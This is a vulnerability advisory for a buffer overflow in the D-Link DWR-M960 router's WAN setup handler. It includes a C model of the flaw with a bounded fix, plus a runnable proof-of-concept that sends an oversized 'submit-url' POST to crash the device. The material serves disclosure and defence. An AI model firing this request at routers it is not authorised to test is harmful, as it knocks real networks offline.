D-Link DWR-M960 Buffer Overflow Vulnerability in WAN Interface Setting Handler
Vulnerability
A buffer overflow vulnerability has been identified in the D-Link DWR-M960 router, firmware version 1.01.07, in the WAN configuration handler. The flaw is in the function 'sub_41914C', which is reached through the '/boafrm/formWanConfigSetup' endpoint of the device's embedded web server. The handler copies the 'submit-url' request parameter into the fixed-size global buffer 'wizard_htm' with 'strcpy' without checking its length, so a request with an oversized 'submit-url' value overflows the buffer. The endpoint is reachable by anyone who can send HTTP requests to the web interface; the advisory does not state whether authentication is required first. One caveat for anyone triaging this: the advisory labels the bug stack-based, but the destination it names is a global buffer, which lives in the data/BSS segment rather than on the stack. The actual class of the overflow, and therefore what lies beyond the buffer, should be confirmed against the firmware before exploitability is assessed.
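The following is an added example, not code from the DWR-M960 firmware or from the advisory. It models the pattern described above, an unchecked strcpy() of the 'submit-url' value into the fixed-size global buffer 'wizard_htm', next to a bounded replacement, and shows the neighbouring global being clobbered. The buffer size, the contents of the neighbouring global and the sentinel value are assumptions chosen for the demonstration; the real size of 'wizard_htm' and what the linker placed after it in firmware 1.01.07 are not known from the advisory.

```c
/* Added example, not code from the DWR-M960 firmware: it models the
 * pattern the advisory describes (an unchecked strcpy() of the
 * submit-url parameter into the fixed-size global buffer wizard_htm)
 * next to a bounded replacement. Buffer size, neighbour contents and
 * the sentinel are assumptions for the demonstration. */
#include <stdio.h>
#include <string.h>

#define WIZARD_HTM_SIZE 64             /* assumed size of wizard_htm      */
#define NEIGHBOUR_SIZE  16             /* assumed size of the next global */
#define SENTINEL        "next_global"  /* marker used to detect corruption */

/* One contiguous region stands in for two adjacent globals so that the
 * overflow stays inside a single C object and the demo is well-defined.
 * In the real binary the neighbour is whatever follows wizard_htm in .bss. */
static char g_region[WIZARD_HTM_SIZE + NEIGHBOUR_SIZE];
static char *const wizard_htm  = g_region;
static char *const next_global = g_region + WIZARD_HTM_SIZE;

void reset_globals(void)
{
    memset(g_region, 0, sizeof g_region);
    memcpy(next_global, SENTINEL, sizeof SENTINEL);
}

/* Returns 1 while the neighbouring global still holds its sentinel. */
int neighbour_intact(void)
{
    return memcmp(next_global, SENTINEL, sizeof SENTINEL) == 0;
}

/* Vulnerable pattern: the parameter value is copied with no length check,
 * as the advisory describes for sub_41914C. */
void wan_config_vuln(const char *submit_url)
{
    strcpy(wizard_htm, submit_url);
}

/* Hardened form: reject anything that would not fit, NUL included.
 * Returns 0 on success, -1 when the value is too long. */
int wan_config_fixed(const char *submit_url)
{
    size_t n = strlen(submit_url);
    if (n >= WIZARD_HTM_SIZE)
        return -1;
    memcpy(wizard_htm, submit_url, n + 1);
    return 0;
}

/* Constructed input: a submit-url value of `len` 'A' bytes, modelled on
 * the oversized parameter the advisory describes. */
static void fill_submit_url(char *buf, size_t len)
{
    memset(buf, 'A', len);
    buf[len] = '\0';
}

/* Drives the vulnerable handler with a value 4 bytes longer than the
 * buffer. Returns 1 if the neighbouring global was clobbered. */
int demo_vuln_clobbers_neighbour(void)
{
    char submit_url[WIZARD_HTM_SIZE + 8];
    reset_globals();
    fill_submit_url(submit_url, WIZARD_HTM_SIZE + 4);
    wan_config_vuln(submit_url);
    return !neighbour_intact();
}

/* Same input against the hardened handler. Returns 1 if the value was
 * rejected and the neighbouring global is untouched. */
int demo_fixed_rejects(void)
{
    char submit_url[WIZARD_HTM_SIZE + 8];
    reset_globals();
    fill_submit_url(submit_url, WIZARD_HTM_SIZE + 4);
    return wan_config_fixed(submit_url) == -1 && neighbour_intact();
}

int main(void)
{
    printf("unchecked strcpy clobbered neighbour:  %s\n",
           demo_vuln_clobbers_neighbour() ? "yes" : "no");
    printf("bounded copy rejected oversized value: %s\n",
           demo_fixed_rejects() ? "yes" : "no");
    return 0;
}
```

The hardened handler rejects rather than truncates: silently cutting a page name to the buffer size would still let an attacker steer the redirect target, so a length check followed by an error is the safer fix for a form parameter like this.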
Impact
Exploiting the overflow lets an attacker overwrite memory beyond the buffer. The most reliable outcome is a denial of service: the web server process crashes or the device reboots. If the overwritten memory includes function pointers or other control data, a crafted payload could instead redirect execution, giving arbitrary code execution with the privileges of the web server, which the advisory states are root. The exact reach of the overwrite depends on what the linker placed after 'wizard_htm', so the code-execution path is potential rather than demonstrated.
Reproduction
Send an HTTP POST request to '/boafrm/formWanConfigSetup' whose 'submit-url' parameter is longer than the 'wizard_htm' buffer. Including the 'save_apply' parameter makes the handler run its save logic, but the copy that overflows happens regardless, so it is not strictly necessary. A crash of the web server or a reboot of the device confirms the issue; that is sufficient for verification, and a crafted payload should not be sent to a production unit.
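The reproduction request described above, as an added example that is not part of the advisory or D-Link's code: it builds the raw POST to '/boafrm/formWanConfigSetup' with an oversized 'submit-url' value and the optional 'save_apply' parameter, checks that the request is self-consistent, and sends it over a plain TCP socket. The payload length (2048 bytes by default), the value "1" for 'save_apply', the Host header and the form encoding are assumptions; the advisory does not state them. Use it only against a device you are authorised to test, and expect the web server to crash or the device to reboot.

```c
/* Added example, not part of the advisory or D-Link's code. Builds the
 * PoC POST request for /boafrm/formWanConfigSetup and sends it. Payload
 * length, the save_apply value and the Host header are assumptions. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>

#define TARGET_PATH "/boafrm/formWanConfigSetup"

/* Builds the raw HTTP/1.1 request. submit_url_len is the number of 'A'
 * bytes placed in the submit-url parameter; with_save_apply adds the
 * optional save_apply parameter (value "1" is assumed). Returns a
 * malloc'd, NUL-terminated request with its length in *out_len, or NULL. */
char *build_poc_request(const char *host, size_t submit_url_len,
                        int with_save_apply, size_t *out_len)
{
    const char *key  = "submit-url=";
    const char *tail = with_save_apply ? "&save_apply=1" : "";
    size_t body_len  = strlen(key) + submit_url_len + strlen(tail);
    char *body = malloc(body_len + 1);
    if (!body)
        return NULL;
    memcpy(body, key, strlen(key));
    memset(body + strlen(key), 'A', submit_url_len);
    memcpy(body + strlen(key) + submit_url_len, tail, strlen(tail) + 1);

    char header[256];
    int hlen = snprintf(header, sizeof header,
        "POST " TARGET_PATH " HTTP/1.1\r\n"
        "Host: %s\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: %zu\r\n"
        "Connection: close\r\n\r\n", host, body_len);
    if (hlen < 0 || (size_t)hlen >= sizeof header) {
        free(body);
        return NULL;
    }
    char *req = malloc((size_t)hlen + body_len + 1);
    if (!req) {
        free(body);
        return NULL;
    }
    memcpy(req, header, (size_t)hlen);
    memcpy(req + hlen, body, body_len + 1);
    free(body);
    *out_len = (size_t)hlen + body_len;
    return req;
}

/* Content-Length the request advertises, or -1 if absent. */
long request_content_length(const char *req)
{
    const char *p = strstr(req, "Content-Length: ");
    return p ? strtol(p + strlen("Content-Length: "), NULL, 10) : -1;
}

/* Number of body bytes that actually follow the blank line, or -1.
 * Comparing this with the advertised length catches a malformed PoC
 * before it is sent. */
long request_body_length(const char *req, size_t req_len)
{
    const char *p = strstr(req, "\r\n\r\n");
    return p ? (long)(req_len - (size_t)(p + 4 - req)) : -1;
}

/* Connects to host:port and writes the request; returns bytes sent or -1. */
static long send_request(const char *host, const char *port,
                         const char *req, size_t len)
{
    struct addrinfo hints = {0}, *res;
    hints.ai_family   = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(host, port, &hints, &res) != 0)
        return -1;
    int fd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
    if (fd < 0 || connect(fd, res->ai_addr, res->ai_addrlen) < 0) {
        freeaddrinfo(res);
        if (fd >= 0)
            close(fd);
        return -1;
    }
    freeaddrinfo(res);
    ssize_t n = write(fd, req, len);
    close(fd);
    return (long)n;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <router-ip> [port] [submit-url-length]\n", argv[0]);
        return 1;
    }
    const char *port = argc > 2 ? argv[2] : "80";
    size_t plen = argc > 3 ? strtoul(argv[3], NULL, 10) : 2048; /* assumed oversize */
    size_t len = 0;
    char *req = build_poc_request(argv[1], plen, 1, &len);
    if (!req || request_body_length(req, len) != request_content_length(req))
        return 1;
    long sent = send_request(argv[1], port, req, len);
    printf("sent %ld of %zu bytes to %s:%s\n", sent, len, argv[1], port);
    free(req);
    return sent < 0;
}
```

The request is written with a single write() and the connection closed; no response is read because a successful trigger typically produces none. Start with a modest length and increase it if the device survives, since the real size of 'wizard_htm' is not published.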
